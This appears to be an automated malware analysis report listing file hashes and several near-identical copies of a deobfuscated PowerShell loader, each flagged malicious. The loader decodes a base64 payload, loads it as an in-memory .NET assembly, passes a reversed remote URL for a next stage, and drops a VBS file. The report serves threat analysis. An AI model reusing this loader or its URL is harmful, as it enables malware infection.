| Hash | Hash Value |
|---|---|
| MD5 | a652fcb1e5206dd1378ffe1964719677 |
| Sha1 | 6d19c80aaf6d047f9e5cdaf8cef292a2fa49911e |
| Sha256 | c722b6557d74a0a6eab889a5e7d81032ff18759bb42928be3a8e4393b1e26f39 |
| Sha384 | 53104d5357bb5d620249344eb3ffedce198c2e64f397dd228f61557dfe73b1efbf579f199a180a463da44b096be28d81 |
| Sha512 | 377f575b1680f44c378eec9d54c7aa720b5792d35107172258492b37eff21dbcd69462cfe67f914cf8b7ae1be89f569e67915cedf0d6cbb1f58c64223f6dab41 |
| SSDeep | 24:Qsx6O/4+yu5b7nxByg5BI8lPMPMuZJYMwA64Ivt55Xhp:7x6A4UnxZ5dM0sg55hp |
| TLSH | CC119410AAEC810975736B09C2BE91541577FA2DAD76CB1D0414D14D06B2A48DDB7F72 |

| Name | Value |
|---|---|
| Deobfuscated PowerShell | $txIeN = "txt.fanmogn/niam/sdaeh/sfer/sovihcra-sim/gpj-626262relgneps/moc.tnetnocresubuhtig.war//:sptth" $x = "C:\ProgramData\dSvwn.txt" $Ogmegc = (Get-Content -Path $x -Encoding "UTF8") $Ogmegc = $Ogmegc."replace"("=========", "A") [Byte[]] $VLmPe = [Convert]::"FromBase64String"($Ogmegc) [AppDomain]::"CurrentDomain"."Load"($VLmPe)."GetType"("FjrD.Gqga")."GetMethod"("NRJOMS")."Invoke"($yNlUO, [object[]] (@(($txIeN), "C:&Users&Admin&AppData&Local&Temp&System2.vbs", "OEzTJC", "03", "1", "caca"))) |
| Deobfuscated PowerShell | $txIeN = "txt.fanmogn/niam/sdaeh/sfer/sovihcra-sim/gpj-626262relgneps/moc.tnetnocresubuhtig.war//:sptth" $x = "C:\ProgramData\dSvwn.txt" $Ogmegc = (Get-Content -Path $x -Encoding "UTF8") $Ogmegc = $Ogmegc."replace"("=========", "A") [Byte[]] $VLmPe = [Convert]::"FromBase64String"($Ogmegc) [AppDomain]::"CurrentDomain"."Load"($VLmPe)."GetType"("FjrD.Gqga")."GetMethod"("NRJOMS")."Invoke"($yNlUO, [object[]] (@({ @(($txIeN), "C:&Users&Admin&AppData&Local&Temp&System2.vbs", "OEzTJC", "03", "1", "caca") } ))) |
| Deobfuscated PowerShell | $txIeN = "txt.fanmogn/niam/sdaeh/sfer/sovihcra-sim/gpj-626262relgneps/moc.tnetnocresubuhtig.war//:sptth" $x = "C:\ProgramData\dSvwn.txt" $Ogmegc = (Get-Content -Path $x -Encoding "UTF8") $Ogmegc = $Ogmegc."replace"("=========", "A") [Byte[]] $VLmPe = [Convert]::"FromBase64String"($Ogmegc) [AppDomain]::"CurrentDomain"."Load"($VLmPe)."GetType"("FjrD.Gqga")."GetMethod"("NRJOMS")."Invoke"($yNlUO, [object[]] @({ @(($txIeN), "C:&Users&Admin&AppData&Local&Temp&System2.vbs", "OEzTJC", "03", "1", "caca") } )) |
| Deobfuscated PowerShell | $txIeN = "txt.fanmogn/niam/sdaeh/sfer/sovihcra-sim/gpj-626262relgneps/moc.tnetnocresubuhtig.war//:sptth" $x = "C:\ProgramData\dSvwn.txt" $Ogmegc = (Get-Content -Path $x -Encoding "UTF8") $Ogmegc = $Ogmegc."replace"("=========", "A") [Byte[]] $VLmPe = [Convert]::"FromBase64String"($Ogmegc) [AppDomain]::"CurrentDomain"."Load"($VLmPe)."GetType"("FjrD.Gqga")."GetMethod"("NRJOMS")."Invoke"($yNlUO, [object[]] @({ @(($txIeN), "C:&Users&Admin&AppData&Local&Temp&System2.vbs", "OEzTJC", "03", "1", "caca") } )) |

| Name | Value | Location |
|---|---|---|
| Deobfuscated PowerShell | $txIeN = "txt.fanmogn/niam/sdaeh/sfer/sovihcra-sim/gpj-626262relgneps/moc.tnetnocresubuhtig.war//:sptth" $x = "C:\ProgramData\dSvwn.txt" $Ogmegc = (Get-Content -Path $x -Encoding "UTF8") $Ogmegc = $Ogmegc."replace"("=========", "A") [Byte[]] $VLmPe = [Convert]::"FromBase64String"($Ogmegc) [AppDomain]::"CurrentDomain"."Load"($VLmPe)."GetType"("FjrD.Gqga")."GetMethod"("NRJOMS")."Invoke"($yNlUO, [object[]] (@(($txIeN), "C:&Users&Admin&AppData&Local&Temp&System2.vbs", "OEzTJC", "03", "1", "caca"))) Malicious |
a652fcb1e5206dd1378ffe1964719677 |
| Deobfuscated PowerShell | $txIeN = "txt.fanmogn/niam/sdaeh/sfer/sovihcra-sim/gpj-626262relgneps/moc.tnetnocresubuhtig.war//:sptth" $x = "C:\ProgramData\dSvwn.txt" $Ogmegc = (Get-Content -Path $x -Encoding "UTF8") $Ogmegc = $Ogmegc."replace"("=========", "A") [Byte[]] $VLmPe = [Convert]::"FromBase64String"($Ogmegc) [AppDomain]::"CurrentDomain"."Load"($VLmPe)."GetType"("FjrD.Gqga")."GetMethod"("NRJOMS")."Invoke"($yNlUO, [object[]] (@({ @(($txIeN), "C:&Users&Admin&AppData&Local&Temp&System2.vbs", "OEzTJC", "03", "1", "caca") } ))) Malicious |
a652fcb1e5206dd1378ffe1964719677 > [Deobfuscated PS] |
| Deobfuscated PowerShell | $txIeN = "txt.fanmogn/niam/sdaeh/sfer/sovihcra-sim/gpj-626262relgneps/moc.tnetnocresubuhtig.war//:sptth" $x = "C:\ProgramData\dSvwn.txt" $Ogmegc = (Get-Content -Path $x -Encoding "UTF8") $Ogmegc = $Ogmegc."replace"("=========", "A") [Byte[]] $VLmPe = [Convert]::"FromBase64String"($Ogmegc) [AppDomain]::"CurrentDomain"."Load"($VLmPe)."GetType"("FjrD.Gqga")."GetMethod"("NRJOMS")."Invoke"($yNlUO, [object[]] @({ @(($txIeN), "C:&Users&Admin&AppData&Local&Temp&System2.vbs", "OEzTJC", "03", "1", "caca") } )) Malicious |
a652fcb1e5206dd1378ffe1964719677 > [Deobfuscated PS] > [Deobfuscated PS] |
| Deobfuscated PowerShell | $txIeN = "txt.fanmogn/niam/sdaeh/sfer/sovihcra-sim/gpj-626262relgneps/moc.tnetnocresubuhtig.war//:sptth" $x = "C:\ProgramData\dSvwn.txt" $Ogmegc = (Get-Content -Path $x -Encoding "UTF8") $Ogmegc = $Ogmegc."replace"("=========", "A") [Byte[]] $VLmPe = [Convert]::"FromBase64String"($Ogmegc) [AppDomain]::"CurrentDomain"."Load"($VLmPe)."GetType"("FjrD.Gqga")."GetMethod"("NRJOMS")."Invoke"($yNlUO, [object[]] @({ @(($txIeN), "C:&Users&Admin&AppData&Local&Temp&System2.vbs", "OEzTJC", "03", "1", "caca") } )) Malicious |
a652fcb1e5206dd1378ffe1964719677 > [Deobfuscated PS] > [Deobfuscated PS] > [Deobfuscated PS] |